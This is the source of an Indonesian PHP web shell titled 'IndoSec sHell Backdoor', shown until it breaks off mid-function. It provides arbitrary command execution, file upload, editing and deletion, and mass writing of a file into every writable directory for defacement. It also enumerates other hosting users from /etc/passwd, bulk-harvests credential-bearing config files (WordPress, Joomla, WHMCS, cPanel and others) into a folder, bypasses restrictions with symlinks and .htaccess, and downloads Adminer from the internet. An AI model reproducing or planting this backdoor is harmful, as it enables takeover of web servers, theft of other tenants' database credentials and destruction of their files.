{ INDOSEC }

sHell Backdoor

Please Login

Copyright 2019 @ { IndoSec } ".$perm.""; }else{ return "".$perm.""; } } function r($dir,$perm){ if(!is_readable($dir)){ return "".$perm.""; }else{ return "".$perm.""; } } function exe($cmd){ if(function_exists('system')){ @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; }elseif(function_exists('exec')){ @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; }elseif(function_exists('passthru')){ @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; }elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000){ $info = 's'; }elseif (($perms & 0xA000) == 0xA000){ $info = 'l'; }elseif (($perms & 0x8000) == 0x8000){ $info = '-'; }elseif (($perms & 0x6000) == 0x6000){ $info = 'b'; }elseif (($perms & 0x4000) == 0x4000){ $info = 'd'; }elseif (($perms & 0x2000) == 0x2000){ $info = 'c'; }elseif (($perms & 0x1000) == 0x1000){ $info = 'p'; }else{ $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } $path = str_replace('\\','/',$path); $paths = explode('/',$path); if(isset($_GET['dir'])){ $dir = $_GET['dir']; chdir($dir); }else{ $dir = getcwd(); } $os = php_uname(); $ip = getHostByName(getHostName()); $ver = phpversion(); $web = $_SERVER['HTTP_HOST']; $sof = $_SERVER['SERVER_SOFTWARE']; $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $mail = (function_exists('mail')) ? "ON" : "OFF"; $total = disk_total_space($dir); $free = disk_free_space($dir); $pers = (int) ($free/$total*100); $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "NONE"; $imgfol = ""; $imgfile = ""; function formatSize( $bytes ){ $types = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 )." ".$types[$i] ); } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } $d0mains = @file("/etc/named.conf", false); if (!$d0mains){ $dom = "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; }else{ $count = 0; foreach ($d0mains as $d0main){ if (@strstr($d0main, "zone")){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } $dom = "$count Domain"; } function swall($swa,$text,$dir){ echo ""; } function about(){ echo '

{ IndoSec }


'; exit; } function aksiUpload($dir){ echo '

//Multiple Upload

'; if(isset($_POST['upload'])){ $jumlah = count($_FILES['file']['name']); for($i=0;$i<$jumlah;$i++){ $filename = $_FILES['file']['name'][$i]; $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); } if($jumlah < 2){ if($up){ $swa = "success"; $text = "Berhasil Upload $filename"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Upload File"; swall($swa,$text,$dir); } }else{ $swa = "success"; $text = "Berhasil Upload $jumlah File"; swall($swa,$text,$dir); } } } function chmodFile($dir,$file,$nfile){ echo "
Chmod File : $nfile
"; if(isset($_POST['perm'])){ if(@chmod($_GET['file'],$_POST['perm'])){ echo 'Berhasil
'; }else{ echo 'Gagal
'; } } exit; } function buatFile($dir,$imgfile){ echo "

$imgfile Buat File :



"; if (isset($_POST['bikin'])){ $name = $_POST['nama_file']; $isi_file = $_POST['isi_file']; foreach ($name as $nama_file){ $handle = @fopen("$nama_file", "w"); if($isi_file){ $buat = @fwrite($handle, $isi_file); }else{ $buat = $handle; } } if ($buat){ $swa = "success"; $text = "Berhasil Membuat File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Membuat File"; swall($swa,$text,$dir); } } } function view($dir,$file,$nfile,$imgfile){ echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]
'.$imgfile.' Lihat File : '.$nfile.'

'; } function editFile($dir,$file,$nfile,$imgfile){ echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "
$imgfile Edit File : $nfile

"; if(isset($_POST['edit_file'])){ $updt = fopen("$file", "w"); $hasil = fwrite($updt, $_POST['isi']); if ($hasil){ $swa = "success"; $text = "Berhasil Update File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Update File"; swall($swa,$text,$dir); } } } function renameFile($dir,$file,$nfile,$imgfile){ echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "
$imgfile Rename File : $nfile

"; if(isset($_POST['rename_file'])){ $lama = $file; $baru = $_POST['namanew']; rename( $baru, $lama); if(file_exists($baru)){ $swa = "success"; $text = "Nama $baru Telah Digunakan"; swall($swa,$text,$dir); }else{ if(rename( $lama, $baru)){ $swa = "success"; $text = "Berhasil Mengganti Nama Menjadi $baru"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Mengganti Nama"; swall($swa,$text,$dir); } } } } function hapusFile($dir,$file,$nfile){ echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "

Yakin Menghapus : $nfile

Tidak
"; if ($_POST['ya']){ if (unlink($file)){ $swa = "success"; $text = "Berhasil Menghapus File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Menghapus File"; swall($swa,$text,$dir); } } } function chmodFolder($dir,$ndir){ echo "
Chmod Folder : $ndir
"; if(isset($_POST['chmo'])){ if(@chmod($_GET['dir'],$_POST['perm'])){ echo 'Change Permission Berhasil
'; }else{ echo 'Change Permission Gagal
'; } } exit; } function buatFolder($dir,$imgfol){ echo "
$imgfol Buat Folder :

"; if (isset($_POST['buat'])){ $nama = $_POST['nama_folder']; foreach ($nama as $nama_folder){ $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder); $fd = @mkdir ($folder); } if ($fd){ $swa = "success"; $text = "Berhasil Membuat Folder"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Membuat Folder"; swall($swa,$text,$dir); } } } function renameFolder($dir,$ndir,$imgfol){ echo "[ Rename ] [ Delete ]
$imgfol Rename Folder : $ndir


"; if(isset($_POST['ganti'])){ $baru = htmlspecialchars($_POST['namanew']); $ubah = rename($dir, "".dirname($dir)."/".$baru.""); if($ubah){ $swa = "success"; $text = "Berhasil Mengganti Nama"; $dir = dirname($dir); swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Mengganti Nama"; $dir = dirname($dir); swall($swa,$text,$dir); } } exit; } function deleteFolder($dir,$ndir){ echo "[ Rename ] [ Delete ]

Apakah Yakin Menghapus : $ndir ?

Tidak

"; if ($_POST['ya']){ if(is_dir($dir)){ if(is_writable($dir)){ @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $swa = "success"; $text = "Berhasil Menghapus"; $dir = dirname($dir); swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Berhasil Menghapus"; $dir = dirname($dir); swall($swa,$text,$dir); } } } exit; } function aksiMasdef($dir,$file,$imgfol,$imgfile){ function tipe_massal($dir,$namafile,$isi_script){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ file_put_contents($lokasi, $isi_script); }elseif($dirb === '..'){ file_put_contents($lokasi, $isi_script); }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ echo "Done > $lokasi\n"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc,$namafile,$isi_script); } } } } } } function tipe_biasa($dir,$namafile,$isi_script){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ file_put_contents($lokasi, $isi_script); }elseif($dirb === '..'){ file_put_contents($lokasi, $isi_script); }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ echo "Done > $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']){ echo "[ Kembali ]
"; }else{ echo "
Tipe :
$imgfol Lokasi :

$imgfile Nama File :

$imgfile Isi File :

"; } exit; } function aksiMasdel($dir,$file,$imgfol,$imgfile){ function hapus_massal($dir,$namafile){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ if(file_exists("$dir/$namafile")){ unlink("$dir/$namafile"); } }elseif($dirb === '..'){ if(file_exists("".dirname($dir)."/$namafile")){ unlink("".dirname($dir)."/$namafile"); } }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ if($lokasi){ echo "$lokasi > Terhapus\n"; unlink($lokasi); $massdel = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']){ echo "[ Kembali ]
"; }else{ echo "
$imgfol Lokasi :

$imgfile Nama File :

"; } exit; } function aksiJump($dir,$file,$ip){ $i = 0; echo "
"; if(preg_match("/hsphere/", $dir)){ $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])){ echo "
";
			foreach($urls as $url){
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)){
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true){
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)){
							$i++;
							$jrw = "[R] $url_user";
							if(is_writable($url_user)){
								$jrw = "[RW] $url_user";
							}
							echo $jrw."
"; } } } } if(!$i == 0){ echo "
Total ada $i KAMAR di $ip"; } echo "
"; }else{ echo '
List Domains:

'; } }elseif(preg_match("/vhosts/", $dir)){ $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])){ echo "
";
			foreach($urls as $url){
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true){
					if(is_readable($web_vh)){
						$i++;
						$jrw = "[R] $web_vh";
						if(is_writable($web_vh)){
							$jrw = "[RW] $web_vh";
						}
						echo $jrw."
"; } } } if(!$i == 0){ echo "
Total ada $i Kamar Di $ip"; } echo "
"; }else{ echo '
List Domains:

'; } }else{ echo "
";
		$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd
"); while($passwd = fgets($etc)){ if($passwd == '' || !$etc){ echo "Can't read /etc/passwd
"; }else{ preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_pro_jump){ $user_jumping_dir = "/home/$user_pro_jump/public_html"; if(is_readable($user_jumping_dir)){ $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)){ $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists('posix_getpwuid')){ $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == ''){ echo " => ( gabisa ambil nama domain nya )
"; }else{ preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj){ $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_pro_jump){ echo " => ( $dj )
"; break; } } } }else{ echo "
"; } } } } } if(!$i == 0){ echo "
Total ada $i kamar di $ip"; } echo "
"; } echo "

"; exit; } function aksiConfig($dir,$file){ if($_POST){ $passwd = $_POST['passwd']; mkdir("indosec_config", 0777); $isi_htc = "Options allnRequire NonenSatisfy Any"; $htc = fopen("indosec_config/.htaccess","w"); fwrite($htc, $isi_htc); preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_con){ $user_config_dir = "/home/$user_con/public_html/"; if(is_readable($user_config_dir)){ $grab_config = array( "/home/$user_con/.my.cnf" => "cpanel", "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_con/public_html/forum/config.php" => "phpBB", "/home/$user_con/public_html/sites/default/settings.php" => "Drupal", "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_con/public_html/app/etc/local.xml" => "Magento", "/home/$user_con/public_html/admin/config.php" => "OpenCart", "/home/$user_con/public_html/application/config/database.php" => "Ellislab", "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin", "/home/$user_con/public_html/inc/config.php" => "MyBB", "/home/$user_con/public_html/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce", "/home/$user_con/public_html/inc/conf_global.php" => "IPB", "/home/$user_con/public_html/wp-config.php" => "Wordpress", "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress", "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress", "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress", "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress", "/home/$user_con/public_html/site/wp-config.php" => "Wordpress", "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress", "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress", "/home/$user_con/public_html/news/wp-config.php" => "Wordpress", "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress", "/home/$user_con/public_html/test/wp-config.php" => "Wordpress", "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress", "/home/$user_con/public_html/home/wp-config.php" => "Wordpress", "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress", "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress", "/home/$user_con/public_html/press/wp-config.php" => "Wordpress", "/home/$user_con/public_html/new/wp-config.php" => "Wordpress", "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress", "/home/$user_con/public_html/configuration.php" => "Joomla", "/home/$user_con/public_html/blog/configuration.php" => "Joomla", "/home/$user_con/public_html/submitticket.php" => "^WHMCS", "/home/$user_con/public_html/cms/configuration.php" => "Joomla", "/home/$user_con/public_html/beta/configuration.php" => "Joomla", "/home/$user_con/public_html/portal/configuration.php" => "Joomla", "/home/$user_con/public_html/site/configuration.php" => "Joomla", "/home/$user_con/public_html/main/configuration.php" => "Joomla", "/home/$user_con/public_html/home/configuration.php" => "Joomla", "/home/$user_con/public_html/demo/configuration.php" => "Joomla", "/home/$user_con/public_html/test/configuration.php" => "Joomla", "/home/$user_con/public_html/v1/configuration.php" => "Joomla", "/home/$user_con/public_html/v2/configuration.php" => "Joomla", "/home/$user_con/public_html/joomla/configuration.php" => "Joomla", "/home/$user_con/public_html/new/configuration.php" => "Joomla", "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS", "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS", "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS", "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS", "/home/$user_con/public_html/host/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS", "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS", "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS", "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS", "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS", "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS", "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS", "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS", "/home/$user_con/public_html/order/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS", "/home/$user_con/public_html/client/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS", "/home/$user_con/public_html/support/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS", "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BUY/sumitticket.php" => "WHMCS", "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS", "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS", "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS", "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS", "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS", "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS", "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS", "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS", "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS", "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS", "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS", "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS", "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS", "/home/$user_con/public_html/account/submitticket.php" => "WHMCS", "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS", "/home/$user_con/public_html/User/submitticket.php" => "WHMCS", "/home/$user_con/public_html/user/submitticket.php" => "WHMCS", "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS", "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS", "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS", "/home/$user_con/public_html/My/submitticket.php" => "WHMCS", "/home/$user_con/public_html/my/submitticket.php" => "WHMCS", "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS", "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS", "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS", "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS", "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS", "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS", "/home/$user_con/public_html/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling", "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills" ); foreach($grab_config as $config => $nama_config){ $ambil_config = file_get_contents($config); if($ambil_config == ''){ }else{ $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } echo "

Success Get Config!!

Click Here"; }else{ echo "

/etc/passwd error ? Bypass Here


"; } exit; } function aksiBypasswd($dir,$file){ echo '

Bypass etc/passwd With :


Bypass User With :

'; $mail = 'ls /var/mail'; $paswd = '/etc/passwd'; if($_POST['syst']){ echo"
"; } if($_POST['passth']){ echo"
"; } if($_POST['ex']){ echo"
"; } if($_POST['shex']){ echo"
"; } if($_POST['melex']){ echo"
"; } if ($_POST['awkuser']){ echo"
"; } if ($_POST['systuser']){ echo"
"; } if ($_POST['passthuser']){ echo"
"; } if ($_POST['exuser']){ echo"
"; } if ($_POST['shexuser']){ echo"
"; } echo "
"; exit; } function aksiAdminer($dir,$file){ $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi){ $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')){ echo "Login Adminer"; }else{ if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")){ echo "

Berhasil!

Login Adminer"; }else{ echo "

Gagal!

"; } } exit; } function aksiSym($dir,$file){ $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $d0mains = @file("/etc/named.conf"); if(!$d0mains){ die ("[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
Error tidak dapat membaca /etc/named.conf

"); } ##htaccess if($d0mains){ @mkdir("indosec_sym",0777); @chdir("indosec_sym"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $dcount = 1; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $dcount++; } } } echo "
No. Domains Users symlink
".$dcount." ".$domains[1][0]." ".$user['name']." Symlink
"; }else{ $TEST = @file('/etc/passwd'); if ($TEST){ @mkdir("indosec_sym",0777); @chdir("indosec_sym"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; $dcount++; } fclose($file); echo "
No. Users symlink
".$dcount." ".$matches." Symlink
"; }else{ if($os != "Windows"){ @mkdir("indosec_sym",0777); @chdir("indosec_sym"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex indsc.html AddType text/plain php html php5 phtml AddHandler text/plain php html php5 phtml Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++){ $uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n"; } echo '
